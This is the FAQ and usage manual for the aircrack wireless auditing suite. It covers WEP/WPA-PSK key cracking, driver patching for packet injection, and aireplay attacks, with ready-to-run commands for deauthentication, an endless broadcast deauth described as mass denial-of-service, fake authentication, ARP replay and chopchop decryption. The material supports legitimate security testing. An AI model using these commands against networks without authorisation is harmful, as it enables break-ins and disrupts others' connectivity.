aircrack documentation
What is aircrack ?
aircrack is a set of tools for auditing wireless networks:
- airodump: 802.11 packet capture program
- aireplay: 802.11 packet injection program
- aircrack: static WEP and WPA-PSK key cracker
- airdecap: decrypts WEP/WPA capture files
Where to download aircrack ?
The official download location is http://www.cr0.net:8040/code/network/.
However, if you can't access port 8040 for some reason, you may use this mirror
instead: http://linuxfromscratch.org/~devine/network/.
Also check this WEP cracking video,
and this other WPA cracking video (flash required).
What is the song in that WEP cracking video ?
The name of the song is Moskau, performed by Dschinghis Khan.
How do I crack a static WEP key ?
The basic idea is to capture as much encrypted traffic as possible using
airodump. Each WEP data packet has an associated 3-byte Initialization
Vector (IV): after a sufficient number of data packets have been collected,
run aircrack on the resulting capture file. aircrack will then perform
a set of statistical attacks developped by a talented hacker named KoreK.
How many IVs are required to crack WEP ?
WEP cracking is not an exact science. The number of required IVs depends on
the WEP key length, and it also depends on your luck. Usually, 40-bit WEP can
be cracked with 300.000 IVs, and 104-bit WEP can be cracked with 1.000.000
IVs; if you're out of luck you may need two million IVs, or more.
I can't seem to capture any IVs !
Possible reasons:
- You are standing too far from the access point.
- There is no traffic on the target wireless network.
- There is some G traffic but you're capturing in B mode.
- Something is wrong with your card (firmware problem ?)
By the way, beacons are just unencrypted announcement packets.
They're totally useless for WEP cracking.
Why is there no Windows version of aireplay ?
WildPackets' PEEK driver doesn't support 802.11 packet injection, period.
Why is there no Windows version of aircrack ?
I don't have enough time to maintain the win32 port of aircrack. Just install
cygwin and compile aircrack with it.
Is my card compatible with airodump /
aireplay ?
First of all, search Google to find which chipset your card has. For example,
if you have an Linksys WPC54G search for
"wpc54g chipset linux".
I will NOT answer emails asking " I have [wireless card foo],
does it work with airodump or aireplay ? "
Some cards are not recognized by the WildPackets driver, even though they
have the correct chipset. In this case, open the hardware manager, select your
card, "Update the driver", select "Install from a specific location", select
"Don't search, I will choose the driver to install", click "Have disk", set
the path to where the WildPackets driver has been unzipped, uncheck
"Show compatible hardware", and finally choose the driver.
How do I update my Prism2 firmware ?
Make sure you are using patched HostAP (see below for instructions on how to
patch and install HostAP). Alternatively, you may boot
the WHAX Live CD! (which already has patched
HostAP) and run the switch-to-hostap script.
Now that HostAP is loaded, you can check your firmware's primary
and station version with this command:
# dmesg | grep wifi
hostap_cs: Registered netdevice wifi0
wifi0: NIC: id=0x800c v1.0.0
wifi0: PRI: id=0x15 v1.1.1 (primary firmware is 1.1.1)
wifi0: STA: id=0x1f v1.7.4 (station firmware is 1.7.4)
wifi0: registered netdevice wlan0
If the NIC id above is between 0x8002 and 0x8008, you have an old Prism2
and MUST use STA firmware version 1.5.6. Otherwise, you should use
PRI 1.1.1 / STA 1.7.4 which is the most stable firmware version for newer
Prism2 cards. Do NOT use firmware 1.7.1 or 1.8.x, people have reported
having trouble with them.
To update the firmware, you'll need prism2_srec from the hostap-utils
package; if it's not present on your system, download hostap-utils from
http://hostap.epitest.fi/, detar
it and run make to compile prism2_srec.
Finally, download the firmware and flash your card. If the NIC id is
between 0x8002 and 0x8008:
wget http://linux.junsun.net/intersil-prism/firmware/1.5.6/sf010506.hex
prism2_srec -v -f wlan0 sf010506.hex
Otherwise:
wget http://linux.junsun.net/intersil-prism/firmware/1.7.4/pk010101.hex
wget http://linux.junsun.net/intersil-prism/firmware/1.7.4/sf010704.hex
prism2_srec -v -f wlan0 pk010101.hex sf010704.hex
Another alternative is to update the firmware with WinUpdate. See
http://www.netgate.com/support/prism_firmware/ (note: the Linksys WPC11
driver v2.5 must be installed, too).
Which is the best card to buy ?
My favourite card is the Netgear WAG511, which is Atheros-based and has
excellent sensitivity (no external antenna connector though). Another
nice Atheros card is the Proxim 8470-WD, this one has an external MC antenna
connector. A cheap Atheros card is the DWL-G650 (either rev. B or C, do not
buy the DWL-650+ which has a TI chipset); the PCI equivalent is the
DWL-G520 (likewise, don't buy the G520+).
How do I use airodump for Windows ?
First of all, make sure that your card is compatible (see table above) and
that you have installed the proper driver from WildPackets. Also, you must
download Peek.dll
and Peek5.sys and put them in the same directory as airodump.exe.
When running airodump, you should specify:
- The network interface index number, which must be picked in the
list displayed by airodump.
- The network interface type ('o' for HermesI and Realtek, 'a' for
Aironet and Atheros).
- The channel number, between 1 and 14. You can also specify 0 to hop
between all channels.
- The output prefix. For example, if the prefix is "foo", then airodump
will create foo.cap (captured packets) and foo.txt (CSV statistics).
- The "only IVs" flag. Specify 1 if you just want to save the IVs from
WEP data packets. This saves space, but the resulting file (foo.ivs)
will only be useful for WEP cracking.
To stop capturing packets, simply press Ctrl-C. You may get a blue screen,
this is due to a bug in the PEEK driver not properly exiting monitor mode.
Also, the capture file may be empty. The cause of this bug is unknown.
Why can't I compile airodump and aireplay on BSD / Mac OS X ?
Both airodump and aireplay sources are linux-specific. There are no plans
to port them on any other operating system.
How do I use airodump for Linux ?
Before running airodump, you may start the airmon.sh
script to list the detected wireless interfaces.
usage: airodump <interface name or pcap filename>
<output prefix> <channel> [IVs flag]
The first argument can be an interface name (such as: eth1, ath0, wlan0,
etc.) in which case airodump will capture packets on this interface. You may
also specify a pcap filename instead, for example to analyze a previous
capture.
You can hop between channels by specifying 0 as the channel number;
however, when attacking a WLAN you should rather specify the channel number
of the target access point. Also, the channel number will be ignored if the
packet source is a capture file.
You may set the optional IVs flag to only write the captured WEP IVs;
this will save a lot of space, but the resulting file won't be useful for
anything else than WEP cracking. If the flag is not set, the whole packets
are saved.
Some examples:
| Channel hopping with HostAP : | airodump wlan0 out 0 |
| Capture packets on channel 7 : | airodump ath0 wlan-dump 7 |
| Extract IVs from a pcap file : | airodump out.cap small 0 1 |
What's the meaning of the fields displayed by airodump ?
airodump will display a list of detected access points, and also a list
of connected clients ("stations"). Here's an example screenshot using
a Prism2 card with HostAP:
BSSID PWR Beacons IP / # Data CH MB ENC ESSID
00:13:10:30:24:9C 223 1045 203 6 48 WEP myap
BSSID STATION PWR Packets ESSID
00:13:10:30:24:9C 00:09:5B:EB:C5:2B 203 154 myap
00:13:10:30:24:9C 00:02:2D:C1:5D:1F 190 17 myap
|
| Field | Description |
|---|
| BSSID | MAC address of the access point. |
| PWR | Signal level reported by the card. Its signification
depends on the driver, but as the signal gets higher you get
closer to the AP or the station. |
| Beacons | Number of announcements packets sent by the AP.
Each access point sends about ten beacons per second at the lowest rate
(1M), so they can usually be picked up from very far. |
| IP / # Data | LAN IP address if unencrypted,
otherwise the number of captured WEP or WPA encrypted data packets
(including data broadcast packets). |
| CH | Channel number (taken from beacon packets). Note:
sometimes packets from other channels are captured even if airodump is not
hopping, because of radio interference. |
| MB | Maximum speed supported by the AP. If MB = 11, it's
802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g. |
| ENC | Encryption algorithm in use. OPN = no encryption,
"WEP?" = WEP or higher (not enough data to choose between WEP and WPA),
WEP (without the question mark) indicates static or dynamic WEP, and WPA
if TKIP or CCMP is present. |
| ESSID | The so-called "SSID", which can be empty if SSID
cloaking is activated. In this case, airodump will try to recover the SSID
from probe responses and association requests. |
| STATION | MAC address of each associated station. In the
screenshot above, two clients have been detected (00:09:5B:EB:C5:2B and
00:02:2D:C1:5D:1F). |
How do I merge multiple capture files ?
You may use the mergecap program
(part of the ethereal-common package or the win32 distribution):
mergecap -w out.cap test1.cap test2.cap test3.cap
As of now, it's not possible to merge .ivs files.
Can I use Ethereal to capture 802.11 packets ?
Under Linux, simply setup the card in monitor mode with the
airmon.sh script. Under Windows,
Ethereal can NOT capture 802.11 packets.
How do I use aircrack ?
Usage: aircrack [options] <capture file(s)>
You can specify multiple input files (either in .cap or .ivs format).
Also, you can run both airodump and aircrack at the same time: aircrack will
auto-update when new IVs are available.
Here's a summary of all available options:
| Option | Param. | Description |
|---|
| -a | amode | Force attack mode (1 = static WEP, 2 = WPA-PSK). |
| -e | essid | If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA-PSK cracking if the ESSID is cloaked (hidden). |
| -b | bssid | Select the target network based on the access point's MAC address. |
| -p | nbcpu | On SMP systems, set this option to the number of CPUs. |
| -q | none | Enable quiet mode (no status output until the key is found, or not). |
| -c | none | (WEP cracking) Restrict the search space to alpha-numeric characters only (0x20 - 0x7F). |
| -d | start | (WEP cracking) Set the beginning the WEP key (in hex), for debugging purposes. |
| -m | maddr | (WEP cracking) MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all and every IVs, regarless of the network. |
| -n | nbits | (WEP cracking) Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128. |
| -i | index | (WEP cracking) Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index. |
| -f | fudge | (WEP cracking) By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelyhood of success. |
| -k | korek | (WEP cracking) There are 17 korek statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively. |
| -x | none | (WEP cracking) Do not bruteforce the last two keybytes. |
| -y | none | (WEP cracking) This is an experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs. |
| -w | words | (WPA cracking) Path to a wordlist. |
Could you implement a resume option in aircrack ?
There are no plans to implement this feature.
How can I crack a WPA-PSK network ?
You must wait until a handshake takes place between a wireless client and
the access point. To force the client to reauthenticate, you can start a
deauth attack with aireplay. Also, a good dictionnary is required; see
http://ftp.se.kde.org/pub/security/tools/net/Openwall/wordlists/
FYI, it's not possible to pre-compute large tables of Pairwise Master
Keys like rainbowcrack does, since the passphrase is salted with the ESSID.
I have more than one million IVs, but
aircrack doesn't find the key !
Possible reasons:
- Out of luck: you must capture more IVs. Usually, 104-bit WEP can be cracked with about one million IVs, but sometimes more IVs are needed.
- If all votes seem equal, or if there are many negative votes, then the capture file is corrupted, or the key is not static.
- A false positive prevented the key from being found. Try to disable each korek attack (-k 1 .. 17), raise the fudge factor (-f) or try the experimental single reverse attack (-y).
I've found the key, how do I decrypt a capture file ?
Simply use the airdecap program:
usage: airdecap [options] <pcap file>
-l : don't remove the 802.11 header
-b bssid : access point MAC address filter
-k pmk : WPA Pairwise Master Key in hex
-e essid : target network ascii identifier
-p pass : target network WPA passphrase
-w key : target network WEP key in hex
examples:
airdecap -b 00:09:5B:10:BC:5A open-network.cap
airdecap -w 11A3E229084349BC25D97E2939 wep.cap
airdecap -e my_essid -p my_passphrase tkip.cap
How do I recover my WEP key in Windows ?
You may use the WZCOOK program which recovers WEP keys from XP's Wireless
Zero Configuration utility. This is experimental software, so it may or may
not work depending on your service pack level.
Does WZCOOK also recovers WPA keys ?
WZCOOK will display the PMK (Pairwise Master Key), a 256-bit value which is
the result of the passphrase hashed 8192 times together with the ESSID and
the ESSID length. The passphrase itself can't be recovered -- however,
knowing the PMK is enough to connect to a WPA-protected wireless network with
wpa_supplicant
(see the Windows README).
Your wpa_supplicant.conf configuration file
should look like:
network={
ssid="my_essid"
pmk=b026324c69[...]0510
}
How do I patch the driver for injection with aireplay ?
As of now, aireplay only supports injection on Prism2, PrismGT (FullMAC),
Atheros, RTL8180 and Ralink 2500. Injection on other chipsets
(including, but not limited to, HermesI, Aironet and Centrino) is not
supported.
Furthermore, all drivers (except prism54) must be patched so as to
support injection in Monitor mode. Some drivers require the full kernel
source to be compiled. If that's not already the case, you should download
the linux source and compile a custom kernel. If you have trouble patching
and compiling stuff, you may want to use the
WHAX or
Auditor LiveCD; both already
include patched device drivers.
- Installing the madwifi driver (Atheros cards)
ifconfig ath0 down
rmmod ath_pci 2>/dev/null
cd /usr/src
wget http://madwifi.otaku42.de/2005/05/\
madwifi-cvs-snapshot-2005-05-25.tar.bz2
tar -xvjf madwifi-cvs-snapshot-2005-05-25.tar.bz2
cd madwifi
patch -Np1 -i ~/aircrack-2.2/linux/patch/madwifi-20050309.patch
make && make install
modprobe ath_pci
Important note: injection with madwifi only works in B mode,
so aireplay will automatically set up the card in this mode by running
"iwpriv ath0 mode 2". You can switch back to
b/g mode afterwards with "iwpriv ath0 mode 0".
- Installing the prism54 driver (PrismGT FullMAC cards)
ifconfig eth1 down
rmmod prism54 2>/dev/null
cd /usr/src
wget http://prism54.org/pub/linux/snapshot/tars/\
prism54-svn-latest.tar.bz2
tar -xvjf prism54-svn-latest.tar.bz2
cd prism54-svn-latest
make modules && make install
mkdir -p /usr/lib/hotplug/firmware
mkdir -p /lib/firmware
wget http://prism54.org/~mcgrof/firmware/1.0.4.3.arm
cp 1.0.4.3.arm /usr/lib/hotplug/firmware/isl3890
mv 1.0.4.3.arm /lib/firmware/isl3890
- Installing the HostAP driver (Prism2 cards)
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable 2>/dev/null
/etc/init.d/pcmcia stop
rmmod prism2_pci 2>/dev/null
rmmod hostap_pci 2>/dev/null
cd /usr/src
wget http://hostap.epitest.fi/releases/hostap-driver-0.3.9.tar.gz
tar -xvzf hostap-driver-0.3.9.tar.gz
cd hostap-driver-0.3.9
patch -Np1 -i ~/aircrack-2.2/linux/patch/hostap-driver-0.3.9.patch
make && make install
mv -f /etc/pcmcia/wlan-ng.conf /etc/pcmcia/wlan-ng.conf~
/etc/init.d/pcmcia start
modprobe hostap_pci
Note: injection on Prism2 is still experimental and may sometimes bug.
If for some reason aireplay seems stuck, you'll have to reset the card with
"iwpriv wlan0 reset 1" and restart aireplay.
- Installing the wlan-ng driver (Prism2 cards)
Note: if you have trouble with this driver, use HostAP instead.
ifconfig wlan0 down
wlanctl-ng wlan0 lnxreq_ifstate ifstate=disable 2>/dev/null
/etc/init.d/pcmcia stop
rmmod prism2_pci 2>/dev/null
rmmod hostap_pci 2>/dev/null
cd /usr/src
wget --passive-ftp ftp://ftp.linux-wlan.org/pub/linux-wlan-ng/\
linux-wlan-ng-0.2.1-pre26.tar.bz2
tar -xvjf linux-wlan-ng-0.2.1-pre26.tar.bz2
cd linux-wlan-ng-0.2.1-pre26
patch -Np1 -i ~/aircrack-2.2/linux/patch/wlanng-0.2.1-pre26.patch
make config && make all
find /lib/modules \( -name p80211* -o -name prism2* \) \
-exec rm -v {} \;
make -C src install
cp etc/pcmcia/wlan-ng.conf /etc/pcmcia/
mv -f /etc/pcmcia/hostap_cs.conf /etc/pcmcia/hostap_cs.conf~
/etc/init.d/pcmcia start
modprobe prism2_pci
- Installing the r8180-sa2400 driver (RTL8180 cards)
ifconfig wlan0 down
rmmod r8180 2>/dev/null
cd /usr/src
wget http://sf.gds.tuwien.ac.at/r/rt/rtl8180-sa2400/\
rtl8180-0.21.tar.gz
tar -xvzf rtl8180-0.21.tar.gz
cd rtl8180-0.21
patch -Np1 -i ~/aircrack-2.2/linux/patch/rtl8180-0.21.patch
make && make install
modprobe r8180
- Installing the rt2500 driver (Ralink b/g cards)
ifconfig ra0 down
rmmod rt2500 2>/dev/null
cd /usr/src
wget http://rt2x00.serialmonkey.com/rt2500-cvs-daily.tar.gz
tar -xvzf rt2500-cvs-daily.tar.gz
cd rt2500-cvs-20050721
patch -Np1 -i ~/aircrack-2.2/linux/patch/rt2500-cvs-20050721.patch
cd Module
make && make install
modprobe rt2500
How do I use aireplay ?
aireplay implements a set of five different attacks. In the following,
00:13:10:30:24:9C is the MAC address of the access point (on channel 6),
and 00:09:5B:EB:C5:2B is the MAC address of a wireless client.
- Attack 0: deauthentication
This attack is mostly useful for capturing WPA handshakes by forcing
clients to reauthenticate. It can also be used to generate ARP requests
as Windows clients sometimes flush their ARP cache when disconnected.
Of course, this attack is totally useless if there are no wireless clients.
Some examples:
- WPA Handshake capture with an Atheros
airmon.sh start ath0
airodump ath0 out 6 (switch to another console)
aireplay -0 5 -a 00:13:10:30:24:9C ath0; iwpriv ath0 mode 0
Note that we switch back to b/g mode after injecting, just in case
the handshake takes place in G mode.
- ARP request generation with a Prism2 card
airmon.sh start wlan0
airodump ath0 out 6 (switch to another console)
aireplay -0 5 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0
After sending the five batches of deauthentication packets, we start
listening for ARP requests with attack "3". The -h option is mandatory
and has to be the MAC address of an associated client.
- Mass denial-of-Service with a Prism54 card
airmon.sh start eth1
aireplay -0 0 -a 00:13:10:30:24:9C eth1
With parameter 0, this attack will loop forever sending deauthentication
packets to the broadcast address, thus preventing clients from staying
connected.
- Attack 1: fake authentication
This attack is particularly useful when there are no connected clients:
we create an fake client MAC address which will be registered in the AP's
association table. This address will then be used for attacks 3 (ARP
request reinjection) and 4 ("chopchop" WEP decryption). However if there is
already an associated client, it's more reliable to just use his MAC address.
aireplay -1 0 -e myap -a 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
12:14:06 Sending Authentication Request
12:14:06 Authentication successful
12:14:06 Sending Association Request
12:14:07 Association successful :-)
Note: some access points require to reassociate every 30 seconds,
otherwise our fake client is considered disconnected. In this case, run
"aireplay -1 30 -e ...".
If this attacks seems to fail (aireplay keeps sending authentication
requests), make sure that:
- You are close enough to the access point.
- The driver is properly patched and installed.
- The card is configured on the same channel as the AP.
- The BSSID (-a option) is correct.
- Attack 2: interactive packet replay
This attack is mostly useless and is present for debugging
purposes only.
- Attack 3: ARP-request reinjection
The classic ARP-request replay attack is the most effective to generate
new IVs, and works very reliably. You need either the MAC address of an
associated client, of a fake MAC from attack 1. This attack will fail if
there is no traffic on the wireless LAN.
aireplay -3 -b 00:13:10:30:24:9C -h 0:1:2:3:4:5 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...
- Attack 4: KoreK's "chopchop" (WEP decryption)
This attack, when successful, can decrypt a WEP data packet without
knowing the key. It can even work against dynamic WEP. However, most
access points are not vulnerable at all. Some may seem vulnerable at
first but actually drop data packets shorter that 60 bytes.
- First, we decrypt one packet :
aireplay -4 -h 00:09:5B:EB:C5:2B ath0
- Let's have a look at the IP address :
tcpdump -s 0 -n -e -r replay_dec-0627-022301.cap
reading from file replay_dec-0627-022301.cap, link-type [...]
IP 192.168.1.2 > 192.168.1.255: icmp 64: echo request seq 1
- Now forge an ARP request :
The source IP (192.168.1.100) doesn't matter, but the destination IP
(192.168.1.2) must respond to ARP requests. The source MAC must belong to
an associated station.
./arpforge replay_dec-0627-022301.xor 1 00:13:10:30:24:9C \
00:09:5B:EB:C5:2B 192.168.1.100 192.168.1.2 arp.cap
- Replay our forged ARP request :
aireplay -2 -r arp.cap ath0
Finally, I'd like to thank all the many, many people who
contributed to aircrack... you know who you are :-)
|